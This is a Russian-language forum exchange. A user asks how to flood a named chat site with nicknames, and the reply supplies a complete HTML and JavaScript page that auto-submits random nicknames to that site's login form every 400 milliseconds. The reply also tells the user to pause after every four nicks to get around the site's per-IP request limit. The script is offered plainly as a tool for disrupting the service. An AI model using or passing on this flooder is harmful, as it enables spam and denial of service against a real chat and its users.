Люди человеки!)) Помогите плиз))) Расскажите как сделать флуд из ников в чате http://www.6684.chatcity.ru/ я попытался но не вышло((( Буду надеяться вы поможете)) Заранее спасибо)
всё элементарно: <HTML> <HEAD> <TITLE>.::chAT FlooDeR::.</TITLE> < script> function flood() { this.document.chat.mn.value=(Math.floor(Math.random()*1000000)) this.document.chat.submit() } setInterval ("flood()", 400) </script> </HEAD> <BODY bgColor=#000066 onload="flood()"> <form method=get action="http://www.6684.chatcity.ru/kpobatka" name="chat" target="new"> <input class="fdown" name="mn" value="nick_there" size=15 maxlength=32> <input type=hidden name="rnd" value="1011522582"> <input class="fdown" type="image" value="Войти"> <input class="fdown" type=button value="Выход" onClick="top.location='http://www.6684.chatcity.ru/kpobatka?f=101&c=6684'"> <input type="hidden" name="c" value="6684"><input type="hidden" name="f" value="11"> </form> </BODY></HTML> ЗЫ: тока учти, что через каждые четыре ника придётся делать паузу, т.к. там стоит ограничение на количество запросов с одного ip в минуту!